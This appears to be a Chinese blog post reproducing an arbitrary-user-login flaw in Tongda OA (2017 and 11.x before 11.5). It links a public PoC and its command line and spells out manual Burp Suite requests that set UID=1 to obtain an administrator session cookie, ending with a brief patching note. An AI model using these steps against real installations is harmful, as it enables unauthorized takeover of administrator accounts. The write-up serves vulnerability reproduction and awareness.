【漏洞复现】通达OA任意用户登录

这位大佬有手工操作复现:
https://www.cnblogs.com/bink1/p/13328579.html

0x01 简介

在 logincheck_code.php 文件,变量 UID 为攻击者可控,攻击者可改变 UID 参数,从而控制该 SQL 语句返回 USER 表中指定 uid参数的用户信息,便可通过伪造参数来达到登录任意用户的目的。该漏洞可获取任意用户session,包括系统管理员

0x02 影响范围

(1)通达OA2017
(2)通达 11.X<11.5版本

0x03 漏洞复现

(1)POC
https://github.com/NS-Sp4ce/TongDaOA-Fake-User#tongdaoa-fake-user
(2)使用方法:
python3 POC.py -v (2017|11) -url url
在这里插入图片描述(3)访问http://192.168.1.1/general/index.php,F12将cookie修改为刚刚POC返回的cookie
在这里插入图片描述(4)成功登录系统
在这里插入图片描述手工方式(burpsuite):

(1)POST /general/login_code.php,响应包获取code_uid的值
(2)POST /logincheck_code.php 请求
    CODEUID=code_uid&UID=1(POST数据内容)
(3)响应包获取sessionID
(4)替换cookie就进OA了,proxy--options--Match and Replace--正则表达式^Cookie.*$,替换内容则为cookie字段完整的内容。

0x04 修复建议

官方已发布最新修正版本,请及时更新补丁

  • 1
    点赞
  • 2
    收藏
    觉得还不错? 一键收藏
  • 0
    评论

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值